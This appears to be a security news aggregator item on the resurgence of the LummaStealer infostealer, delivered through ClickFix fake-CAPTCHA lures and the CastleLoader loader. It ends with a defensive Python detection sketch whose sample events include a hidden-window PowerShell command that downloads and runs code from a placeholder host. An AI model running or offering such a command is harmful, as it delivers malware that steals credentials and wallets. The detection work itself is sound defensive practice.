Security News

Cybersecurity news aggregator

MEDIUM Attacks Web Discovery

LummaStealer surges with CastleLoader and ClickFix techniques

  • What: LummaStealer infections are surging, using the ClickFix social engineering technique to deploy CastleLoader malware.
  • Impact: Systems are infected with LummaStealer, an infostealer, via CastleLoader, which evades detection using obfuscation and environment checks.

Data Security, Malware

February 12, 2026
By SC Staff

LummaStealer infections have seen a significant increase, primarily utilizing the ClickFix social engineering technique to deploy the CastleLoader malware. This resurgence follows a major disruption of the LummaStealer malware-as-a-service platform in May 2025, which saw over 2,300 domains seized. Despite law enforcement efforts, the operation resumed in July 2025 and has since scaled considerably, as covered by Bleeping Computer.

The current LummaStealer campaigns are heavily reliant on CastleLoader, a modular malware loader that executes payloads in memory with extensive obfuscation. CastleLoader, which emerged in early 2025, has been used to distribute various infostealers and remote access trojans. It employs sophisticated techniques to evade detection, including environment checks and adaptive persistence mechanisms.

The ClickFix method, a key infection vector, tricks users into executing malicious PowerShell commands by presenting fake CAPTCHA or verification pages. These commands download and run CastleLoader, which then delivers LummaStealer. The malware targets sensitive data such as credentials, cryptocurrency wallet details, and session cookies.

The renewed activity of LummaStealer, amplified by CastleLoader and ClickFix, highlights the persistent threat of infostealer operations and the adaptability of cybercriminals. Organizations should prioritize educating employees about phishing and social engineering tactics and implement strong security protocols to mitigate the risk of credential theft and data breaches.
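A detection sketch for the ClickFix step described above, added here as an example and not taken from SC Media or Bleeping Computer: it scores process-creation events (using Sysmon Event ID 1 field names) for PowerShell started from the user's desktop shell with download-and-run traits. The rule set, the threshold and the sample events are assumptions constructed for illustration, not indicators from the reported campaigns.

```python
import re

# Rule set and threshold are assumptions for this example, not indicators from the article.
SHELLS = {"powershell.exe", "pwsh.exe"}
USER_PARENTS = {"explorer.exe"}  # commands a user pastes and runs inherit the desktop shell as parent
RULES = {
    "hidden_window": re.compile(r"-w(?:in(?:dowstyle)?)?\s+(?:hidden|1)\b", re.I),
    "download": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "encoded": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "captcha_lure": re.compile(r"#.*(?:not a robot|captcha|verif)", re.I),
}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return the sorted list of matched traits for one process-creation event."""
    if basename(event["Image"]) not in SHELLS:
        return []
    reasons = [name for name, rx in RULES.items() if rx.search(event["CommandLine"])]
    if basename(event["ParentImage"]) in USER_PARENTS:
        reasons.append("user_shell_parent")
    return sorted(reasons)

def detect(events, threshold=3):
    """Flag events with at least `threshold` traits; one trait alone is common in admin work."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            hits.append((ev["Computer"], reasons))
    return hits

# Constructed sample events (not real telemetry); example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"Computer": "WS-014", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr https://example.invalid/v)" # I am not a robot: ID 4821'},
    {"Computer": "SRV-002", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"Computer": "WS-020", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": 'pwsh.exe -c "iwr https://example.invalid/tool.zip -OutFile tool.zip"'},
]

if __name__ == "__main__":
    for computer, reasons in detect(SAMPLE_EVENTS):
        print(computer, ", ".join(reasons))
```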
Source: Bleeping Computer